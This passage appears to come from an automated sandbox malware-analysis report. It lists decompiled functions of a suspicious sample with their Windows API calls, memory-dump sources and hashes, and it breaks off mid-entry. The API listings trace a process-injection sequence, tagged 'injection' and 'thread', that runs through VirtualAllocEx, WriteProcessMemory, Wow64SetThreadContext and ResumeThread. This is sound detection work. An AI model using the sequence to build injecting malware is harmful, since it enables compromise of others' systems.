                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 2e43c99c7d58af630409dad588e0cfb54d5627d2aaf517c5ad94845320eb4d26
                                                                                                                                                                      • Instruction ID: 68c04880c8f972e800713349b87ea2e47118f8eb08a5c800bf53758e9e02170a
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e43c99c7d58af630409dad588e0cfb54d5627d2aaf517c5ad94845320eb4d26
                                                                                                                                                                      • Instruction Fuzzy Hash: 7EA13CB1D0031ADFEB20DFA8C8817DDBBB2EF44314F1485A9E849A7254DB749985CF92
                                                                                                                                                                      Function 07B5DE50 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07B5E086
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: dd406e1ad6ab16b7f384e1bcfc1a1d550f2407b5c6f839bde293c581a2090a23
                                                                                                                                                                      • Instruction ID: 9346ee2dee2cc55ae0ed8b80f9291c4261e4578d1b1bba390e681ee86bf75362
                                                                                                                                                                      • Opcode Fuzzy Hash: dd406e1ad6ab16b7f384e1bcfc1a1d550f2407b5c6f839bde293c581a2090a23
                                                                                                                                                                      • Instruction Fuzzy Hash: FA913BB1D0031ADFEB20DFA8C8817DDBBB2EF44314F1485A9E849A7254DB749985CF92
                                                                                                                                                                      Function 0178B401 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 0178B666
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 44c7d8875bb878c4772ad2c9efae1d11cf89c52ebc1817309110ba9eb1afa5f6
                                                                                                                                                                      • Instruction ID: 0aed9ad616524ae86c3ab5aa0173a16a03eeb80c89bc439e2ba1baa73aaa25c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 44c7d8875bb878c4772ad2c9efae1d11cf89c52ebc1817309110ba9eb1afa5f6
                                                                                                                                                                      • Instruction Fuzzy Hash: 60814470A00B058FD724EF29D44575ABBF1FF88300F108A2ED48AD7A54DB34E949CBA0
                                                                                                                                                                      Function 05771E78 Relevance: 1.7, APIs: 1, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 94b0180a39f2f7a33cab4c1c4a00f39b837d510beae558d56d1c5778bd9c30b3
                                                                                                                                                                      • Instruction ID: 1ddea8892530ab60977de8f18a4c740848bec23db68f1b8b5c13c9d535c21d2b
                                                                                                                                                                      • Opcode Fuzzy Hash: 94b0180a39f2f7a33cab4c1c4a00f39b837d510beae558d56d1c5778bd9c30b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 886113B1C04249AFCF02CFA9D984ADDBFB2BF49300F54815AE818AB221D7719945DF51
                                                                                                                                                                      Function 05771ECC Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05771FEA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                      • Opcode ID: 4d11687860cfa77344b8b76b2cac3e1499f296201c9a4568bc767c0de061a852
                                                                                                                                                                      • Instruction ID: 1a53d260cb2b75ea3f963d1d026e232c9a0970184d787a96e6f2f7d442ce89e2
                                                                                                                                                                      • Opcode Fuzzy Hash: 4d11687860cfa77344b8b76b2cac3e1499f296201c9a4568bc767c0de061a852
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E51CEB5D003499FDF14CFA9D984ADEBFB5BF48300F24812AE419AB211D7749945CF91
                                                                                                                                                                      Function 05771ED8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05771FEA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 716092398-0
                                                                                                                                                                      • Opcode ID: 4937b09ab9f552f6d1fb98546d59e6d54452b3c513962228cdc0bbff569520c1
                                                                                                                                                                      • Instruction ID: 7bbbdf622c93d34ae4089e8326d6903cd2f37577fec129e378c2c3d5977e8736
                                                                                                                                                                      • Opcode Fuzzy Hash: 4937b09ab9f552f6d1fb98546d59e6d54452b3c513962228cdc0bbff569520c1
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D41AFB5D003099FDF14CF9AD984ADEBFB5BF48310F24812AE819AB210D7759945CF91
                                                                                                                                                                      Function 0577173C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 05774561
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1730192031.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5770000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallProcWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2714655100-0
                                                                                                                                                                      • Opcode ID: 44878d3befea4abaded744d56f70fa0ec70d3bd6f77dd0eb6824e909f270559b
                                                                                                                                                                      • Instruction ID: d1ec2a38fcab9eda00945f61ddf063cd9c0925a7dba79f78b376a42361ccd9fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 44878d3befea4abaded744d56f70fa0ec70d3bd6f77dd0eb6824e909f270559b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3D411DB5A00309CFCB14CF59D488AAABBF6FB88314F24C459D519AB321D774E941DFA0
                                                                                                                                                                      Function 01784A18 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 01786011
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: b5f6be47e79acd86e1a061ff06722cbbfa1473316d0423a409372a2fd71c6702
                                                                                                                                                                      • Instruction ID: c512df067d20342f2881f81090c81a67736a99da3d23d1da2afe2803770ba8e4
                                                                                                                                                                      • Opcode Fuzzy Hash: b5f6be47e79acd86e1a061ff06722cbbfa1473316d0423a409372a2fd71c6702
                                                                                                                                                                      • Instruction Fuzzy Hash: 6D41E2B0C00619DFDB24DFA9C844B9DFBF5BF48304F2480AAE408AB255DBB56946CF91
                                                                                                                                                                      Function 01785F54 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 01786011
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 84249bc8cb93f609cc8f6b12ca26e0366a6b97de3058ab1d49dd7fc3fd147efc
                                                                                                                                                                      • Instruction ID: 3989555b5185a28d9f4c85daa61516edfda9d4f6c2393b3724eb75c04302ae68
                                                                                                                                                                      • Opcode Fuzzy Hash: 84249bc8cb93f609cc8f6b12ca26e0366a6b97de3058ab1d49dd7fc3fd147efc
                                                                                                                                                                      • Instruction Fuzzy Hash: C14100B0C00619DEDB24DFA9C844B8DFBF5BF48304F2480AAE408AB255DBB56946CF91
                                                                                                                                                                      Function 093B8A98 Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                      • Opcode ID: b77dcf943c1b0713c76d95ad7b0a99ec4bdacf2a5187e1ff5e2c5082fe0c0738
                                                                                                                                                                      • Instruction ID: 2d0a56db2c7a211bdf62b6fd452bc1947f036ab17e599db40a651ee1256ab22f
                                                                                                                                                                      • Opcode Fuzzy Hash: b77dcf943c1b0713c76d95ad7b0a99ec4bdacf2a5187e1ff5e2c5082fe0c0738
                                                                                                                                                                      • Instruction Fuzzy Hash: BC318B729053589FCB01CFA9D804AEEBFF8EF09310F14849AF654AB661C3359950DFA1
                                                                                                                                                                      Function 07B5D7C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D858
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: e96ed1eb97dd9f58902c4d98eb539ea58898aee6ad3269f45746a2294abf6825
                                                                                                                                                                      • Instruction ID: 87267fd6f58b2d5488607c365c0572154eda75e9389019a2fffff58f7040c157
                                                                                                                                                                      • Opcode Fuzzy Hash: e96ed1eb97dd9f58902c4d98eb539ea58898aee6ad3269f45746a2294abf6825
                                                                                                                                                                      • Instruction Fuzzy Hash: F82175B1D003499FDB10CFA9C985BDEBBF0FF48310F10882AE818A7240C7789A54CBA4
                                                                                                                                                                      Function 07B5D7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07B5D858
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: 2891555ec56bf19e5c075f7e25ac7f937d627e2961d79aa0f5b09e6d120128de
                                                                                                                                                                      • Instruction ID: 4787f4797c918e03b92a6cfa7993a68710538ae7ba3cac518a066e400017f767
                                                                                                                                                                      • Opcode Fuzzy Hash: 2891555ec56bf19e5c075f7e25ac7f937d627e2961d79aa0f5b09e6d120128de
                                                                                                                                                                      • Instruction Fuzzy Hash: EB2139B1D003599FDB10DFA9C985BDEBBF5FF48310F108429E958A7250D7789944CBA4
                                                                                                                                                                      Function 0178D8E2 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0178D96F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: eadc5d10995114efbe4b300a6047408f68f898bfb57e58722bf9ea2dff1bbd1c
                                                                                                                                                                      • Instruction ID: afa76d369408dfb865e5b328bbff3535777cab435aea11134c532430bdb1d23a
                                                                                                                                                                      • Opcode Fuzzy Hash: eadc5d10995114efbe4b300a6047408f68f898bfb57e58722bf9ea2dff1bbd1c
                                                                                                                                                                      • Instruction Fuzzy Hash: AA2105B59002589FDB10CFA9D584ADEFFF5FB48320F14805AE958A7250D374A944CFA5
                                                                                                                                                                      Function 07B5D700 Relevance: 1.6, APIs: 1, Instructions: 65memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: b962903eb1d6b6499108cb12674e7460c1b7f9d3a6880a3d285a655508fd6b63
                                                                                                                                                                      • Instruction ID: 19803343d086c0ac79afddd6a7baabd7d21c40808c6bbc4d5aa0ae7093a2e79d
                                                                                                                                                                      • Opcode Fuzzy Hash: b962903eb1d6b6499108cb12674e7460c1b7f9d3a6880a3d285a655508fd6b63
                                                                                                                                                                      • Instruction Fuzzy Hash: 682189B6D002098FDB10DF99C8447EEFBF5EF88320F24892AD568A7250C7359550DFA4
                                                                                                                                                                      Function 07B5DCB0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 138f3713ae2ae1332986291b5ada805572ed48a7d16ce24bd16afc0953f7c1b7
                                                                                                                                                                      • Instruction ID: 39fd38b03edd41628810ba19f03621f222e046a46269375adc283f15d64ec488
                                                                                                                                                                      • Opcode Fuzzy Hash: 138f3713ae2ae1332986291b5ada805572ed48a7d16ce24bd16afc0953f7c1b7
                                                                                                                                                                      • Instruction Fuzzy Hash: D92136B19002599FDB10DFAAC881AEEFBF5FF48310F10842AE958A7250C7789544CBA5
                                                                                                                                                                      Function 07B5D630 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: bb64664d68692cc92b3318d02052df69925d779a6583492358356cbc1d5f6a1b
                                                                                                                                                                      • Instruction ID: 729a0fd011048f591b43fc381f62559fe837860d1645682d58c34ee1304d875a
                                                                                                                                                                      • Opcode Fuzzy Hash: bb64664d68692cc92b3318d02052df69925d779a6583492358356cbc1d5f6a1b
                                                                                                                                                                      • Instruction Fuzzy Hash: AF2138B1D002098FDB10DFAAC4857EEBBF4EF48324F108429D559A7240CB78A985CFA5
                                                                                                                                                                      Function 07B5DCB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07B5DD38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: e48e10ba016ee276e298b308858d6f8b4a7c788b6f8f850cb7934bd6e446d851
                                                                                                                                                                      • Instruction ID: 0e5428cb14cc90e5b353128ddd2a0d6d15b7a045f4dbc44663706fe1b7ee996e
                                                                                                                                                                      • Opcode Fuzzy Hash: e48e10ba016ee276e298b308858d6f8b4a7c788b6f8f850cb7934bd6e446d851
                                                                                                                                                                      • Instruction Fuzzy Hash: 112128B1D002599FDB10DFAAC880BDEFBF5FF48310F108429E958A7250C7789544CBA5
                                                                                                                                                                      Function 0178D8E8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0178D96F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1724541597.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_1780000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: 3cdbd395b0b48e20c0975702466399a0aa5247f4161a7cc287db5bf58cccfbac
                                                                                                                                                                      • Instruction ID: 9baac489351e1fd56aa9237f34810aba7a6cb53eb9e8c0daad3ad564ef09c2d9
                                                                                                                                                                      • Opcode Fuzzy Hash: 3cdbd395b0b48e20c0975702466399a0aa5247f4161a7cc287db5bf58cccfbac
                                                                                                                                                                      • Instruction Fuzzy Hash: 2321E0B59002089FDB10CFAAD984ADEFBF9FB48320F14801AE958A3250D374A944CFA5
                                                                                                                                                                      Function 07B5D629 Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B5D6AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 60e0c4613e390be58fc53217cbf13816265b88ffb503316c58825bace0321574
                                                                                                                                                                      • Instruction ID: 1bc74235ebd573eb493b81b9df35d01b5da62c40d77b963348967b040f7f4c74
                                                                                                                                                                      • Opcode Fuzzy Hash: 60e0c4613e390be58fc53217cbf13816265b88ffb503316c58825bace0321574
                                                                                                                                                                      • Instruction Fuzzy Hash: 462138B1D003098FDB10DFA9C5857EEBBF0EF48314F20842AD959A7240CB78A985CF95
                                                                                                                                                                      Function 07B5D578 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 93a0c9a922864f8e1b6f3fe6751244435cb2f233542996d011b0e44d8549d29a
                                                                                                                                                                      • Instruction ID: 3dd93d138065592d8df3c7115237c1809a59f5dcbf05078d7b621f9492d65880
                                                                                                                                                                      • Opcode Fuzzy Hash: 93a0c9a922864f8e1b6f3fe6751244435cb2f233542996d011b0e44d8549d29a
                                                                                                                                                                      • Instruction Fuzzy Hash: 012189B1D002498FDB14DFA9D5857EEFBF4EF88324F24849AC859A7250CB38A540CF95
                                                                                                                                                                      Function 093B7918 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,093B8AB2,?,?,?,?,?), ref: 093B8B57
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                      • Opcode ID: 436f3346564501ef9a3afa1a75c8188d7bf010b8250339017b8679556c66ba70
                                                                                                                                                                      • Instruction ID: 837320d6ebd49207c5fb297d76754ad3c5d03293ddb6c2999d158be83bd675fe
                                                                                                                                                                      • Opcode Fuzzy Hash: 436f3346564501ef9a3afa1a75c8188d7bf010b8250339017b8679556c66ba70
                                                                                                                                                                      • Instruction Fuzzy Hash: E41126B58002499FDB10DFAAD844BDEBFF8EB48320F14845AE554A7210C375A950DFA5
                                                                                                                                                                      Function 093B8AE1 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,093B8AB2,?,?,?,?,?), ref: 093B8B57
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1733208660.00000000093B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 093B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_93b0000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFromIconResource
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3668623891-0
                                                                                                                                                                      • Opcode ID: dda8cd611c70f3e5ac47d95265baca23450086dd672a55e7653a6722a4b42b81
                                                                                                                                                                      • Instruction ID: 9e61990e92c8b85395f1dd2b7a604ecb093a51bef02f7404a506852324c14001
                                                                                                                                                                      • Opcode Fuzzy Hash: dda8cd611c70f3e5ac47d95265baca23450086dd672a55e7653a6722a4b42b81
                                                                                                                                                                      • Instruction Fuzzy Hash: C42126B58002599FDB10CFAAD844ADEBFF8EB48320F14845AE559A7220C335A950DFA5
                                                                                                                                                                      Function 07B5D708 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07B5D776
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 0a0a15ad410eeeb27d12dd63aa667c6bbf0cd952856d8403a809fda07ec92999
                                                                                                                                                                      • Instruction ID: 4137cf3fb773368921ae450222da03f03fc46a0938b5f99b8eff28aa19fcff5a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a0a15ad410eeeb27d12dd63aa667c6bbf0cd952856d8403a809fda07ec92999
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E1137B29002499FDB10DFAAC844BDEFFF5EF88320F208819E559A7250C775A544CFA5
                                                                                                                                                                      Function 07B5D580 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1732954078.0000000007B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B50000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7b50000_SecuriteInfo.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
